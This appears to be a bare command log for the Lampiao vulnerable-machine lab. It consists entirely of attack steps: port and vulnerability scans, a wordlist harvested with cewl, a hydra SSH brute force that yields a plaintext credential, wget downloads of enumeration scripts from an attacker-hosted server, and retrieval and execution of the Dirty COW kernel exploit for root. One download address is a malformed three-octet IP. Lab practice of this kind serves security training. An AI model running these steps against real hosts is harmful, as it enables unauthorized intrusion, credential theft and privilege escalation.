nmap -A -p- -oA lampiao 192.168.213.48 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA lampiao 192.168.213.48
nmap -sU -O -p- -oA lampiao-udp 192.168.213.48
nikto -h 192.168.213.48 :80
http://192.168.213.48:1898
whatweb http://192.168.213.48:1898
http://192.168.213.48/CHANGELOG.txt
cewl 'http://192.168.213.48:1898/?q=node/1' -w pass.txt
hydra -l tiago -P pass.txt ssh://192.168.213.48 -t 4
credenciales tiago:Virgulino
python3 -m http.server 80
cd /tmp
wget http://192.49.152/lse.sh
https://github.com/jondonas/linux-exploit-suggester-2
wget http://192.49.152/linux-exploit-suggester-2.pl
chmod +x linux-exploit-suggester-2.pl
./linux-exploit-suggester-2.pl
searchsploit -m 40847.cpp
wget http://192.49.152/40847.cpp
chmod 755 40847.cpp
./dcow